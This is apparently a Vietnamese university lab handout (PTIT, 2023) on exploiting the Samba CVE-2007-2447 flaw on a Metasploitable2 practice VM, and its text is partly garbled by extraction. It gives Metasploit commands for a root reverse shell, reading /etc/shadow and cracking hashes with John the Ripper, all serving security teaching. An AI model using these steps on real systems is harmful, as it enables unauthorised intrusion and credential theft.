1. Trang chủ
  2. » Luận Văn - Báo Cáo

Bài thực hành 1 an toàn hệ Điều hành

12 0 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề An Toàn Hệ Điều Hành
Tác giả Lại Quốc Đạt
Người hướng dẫn Giảng Viên: Hoàng Xuân Dậu
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Chuyên ngành An Toàn Thông Tin
Thể loại Bài Thực Hành
Năm xuất bản 2023
Thành phố Hà Nội
Định dạng
Số trang 12
Dung lượng 3,86 MB

Nội dung

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG KHOA AN TOÀN THÔNG TIN Học phần: An toàn hệ điều hành Giảng viên: Hoàng Xuân Dậu Bài thực hành số: 01 Hà Nội, 03/2023... - Tạo một người dùng m

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA AN TOÀN THÔNG TIN

Học phần: An toàn hệ điều hành Giảng viên: Hoàng Xuân Dậu

Bài thực hành số: 01

Hà Nội, 03/2023

Trang 2

1 Mục đích

- Tìm hi u v các lể ề ỗ h ng mổ ột s d ch vố ị ụ, phần mềm trên HĐH

- Luy n th c hành t n công ki m soát h ệ ự ấ ể ệ thống ch y Ubuntu t xa s d ng công c tạ ừ ử ụ ụ ấn công Metasploit trên Kali Linux

2 Các phần m m, công c c n có ề ụ ầ

- Kali Linux

- Metasploit

- Metasploitable2: máy o VMWare ch a l i ả ứ ỗ

3 Tìm hi u v các l h ng bể ề ỗ ổ ảo mật trên m t s d ộ ố ịch v c a Ubuntu ụ ủ

- Metasploitable2 là m t máy ộ ảo VMWare được tích hợp nhiều d ch v ị ụ chứa các l i bỗ ảo

mật đã biết cho phép khai thác ki m soát h ể ệ thống t xa ph c v h c t p Danh sách cáừ ụ ụ ọ ậ

lỗ hổng và hướng dẫn khai thác có th tìm tể ại:

https://www.hackingarticles.in/comprehensive-guide-on- metasploitable-2/

- Lỗ h ng là l h ng b o m t CVE-2007-2447 trên d ch v chia s file SMB (Samba) vổ ỗ ổ ả ậ ị ụ ẻ ới các phiên bản Samba 3.0.0 đến 3.0.25rc3 có th cho phép th c thi mã t xa Chi ti t v ể ự ừ ế ề

lỗ h ng này có th tìm t i: ổ ể ạ https://nvd.nist.gov/vuln/detail/CVE-2007-2447

4 Nội dung th c hành ự

4.1 Cài đặt các công cụ n n t ề ảng

- Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy o (ho c máy thả ặ ực)

- Đổi tên máy Kali Linux thành d ng Mã SV-Tên-Kali ạ

- Kiểm tra và ch y th b công c tạ ử ộ ụ ấn công MetaSploit

- Tải và cài đặt Metasploitable2 làm máy victim:

• S d ng VMWare Player hoử ụ ặc VMWare để mở và khởi động máy o Tài khoả ản đăng nhập vào h ệ thống là msfadmin / msfadmin

Trang 3

- Tạo một người dùng m i trên máy ớ

- Tạo mới người dùng cho mình: ‘sudo useradd lqdat036’, trong đó ghép tên không dấu +

chữ cái đầu của họ đệm và 3 s mã sinh viên T o m t khố ạ ậ ẩu cho người dùng: sudo passwd lqdat036’,

- Nh p mậ ật kh u mới 2 lần (lưu ý đặẩ t mật khẩu đơn giản và ngắn để có thể crack được)

- Đặ ạt l i tên máy ch a l i là Mã SV+Hứ ỗ ọ và tên Khởi động lại máy victim để máy nh n tên ậ

mới

4.2 Quét máy victim Metasploitable2 tìm các l hỗ ổ ng t n tại ồ

- Tìm địa chỉ IP của máy victim, kali:

• Chạy l nh trong c a s terminal: ệ ử ổ ‘ifconfig eth0’

• Tìm IP v4 interface eth0 mở ở ục ‘inet addr’

Trang 5

- Kiểm tra k t nế ối m ng gi a các máy: ạ ữ

• Từ máy victim, ch y l nh ạ ệ ping <ip_máy kali>

• Từ máy Kali, ch y lạ ệnh ping <ip_máy victim>

- S d ng công c ử ụ ụ nmap để rà quét các lỗ h ng t n tổ ồ ại trên máy ch y Metasploitable2: ạ

• Quét c ng d ch v netbios-ssn cổ ị ụ ổng 139: ‘nmap script vuln -p139 <IP_máy

đích>’

Trang 6

• Quét c ng d ch v microsoft-ds cổ ị ụ ổng 445: ‘nmap script vuln -p445 <IP_máy

đích>’

4.3 Khai thác tìm phiên bản Samba đang hoạt động:

- Khởi động Metasploit:

- Khai báo s dử ụng mô đun tấn công: ‘msf > use auxiliary/scanner/smb/smb_version

- Chạy l nh “show options” xem các thông tin v ệ để ề mô đun tấn công đang sử dụng

- Đặt địa ch IP máy victim: ỉ ‘msf > set RHOST <ip_victim>

- Thực thi t n công: ấ ‘msf > run’

Trang 7

➔ Máy victim s t kê tên d ch v Samba và phiên bẽ liệ ị ụ ản -> khoanh đỏ thông tin phiên bản Samba

- Gõ lệnh exit để kết thúc

4.4 Khai thác lỗi trên Samba cho phép m shell ch y v ở ạ ới quy n root: ề

- Khởi động Metasploit

Khai báo s dử ụng mô đun tấn công: ‘msf > use exploit/multi/samba/usermap_script’

- Chạy l nh “show options” xem các thông tin v ệ để ề mô đun tấn công đang sử dụng

Trang 8

- Đặt địa chỉ IP máy victim: ‘msf > set RHOST <ip_victim>’

- Chọn payload cho th c thi (m shell): ự ở ‘msf > set payload cmd/unix/reverse’

- Đặt 445 là c ng truy c p máy victim: ổ ậ ‘msf > set RPORT 445’

- Chạy l nh “show options” xem các thông tin v ệ để ề thiế ậ ấn công đang sử dụng t l p t

Trang 9

- Thực thi t n công: ấ ‘msf > exploit’

➔ C a h u m ử ậ ở shell với người dùng root cho phép ch y l nh t máy Kali ạ ệ ừ

➔ có th ể thực hi n b t cệ ấ ứ l nh shell nào trên máy victim ệ

- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:

whoami uname -a

- Lấy tên người dùng và m t khậ ẩu đã tạo ở m c 3.1: ụ

‘cat /etc/shadow | grep datlq036’, trong đó datlq036 là tên người dùng của mình đã tạo

Trang 10

- Chọn và sao chép c ả dòng tên người dùng và m t khậ ẩu băm vào clipboard

- M mở ột c a s Terminal m i, ch y l nh: ử ổ ớ ạ ệ ‘nano password’

- Sau đó paste thông tin tên người dùng và m t khậ ẩu băm từ clipboard vào file password Gõ Ctrl-x để lưu vào file

- Crack để lấy mật khẩu s dử ụng chương trình john the ripper (hoặc 1 công cụ crack mật khẩu khác): ‘john show password ’ Chụp màn hình sao chép k t qu crack m t khế ả ậ ẩu

Trang 11

- Gõ Ctrl-c để ế k t thúc

5 Yêu cầu cần đạt

a Thành thạo cài đặt và ch y máy o Ubuntu ạ ả

Trang 12

b Thành th o s dạ ử ụng Metasploit để tấn công khai thác l h ng s dỗ ổ ử ụng thư viện có sẵn

c Chụp ảnh màn hình k t qu ế ả lưu vào file (hoặc giữ nguyên cửa s màn hình th c hi n): ổ ự ệ

- Màn hình quét các l hỗ ổng

- Màn hình phiên b n Samba ả

- Màn hình sau khi t n công thành công và ch y các l nh whoami và uname -a trên h ấ ạ ệ ệ thống victim (tên máy đặt lại theo yêu cầu);

- Màn hình ch y l nh cat trích xu t tên và m t khạ ệ ấ ậ ẩu người dùng

- Màn hình crack m t khậ ẩu

Ngày đăng: 15/02/2025, 22:18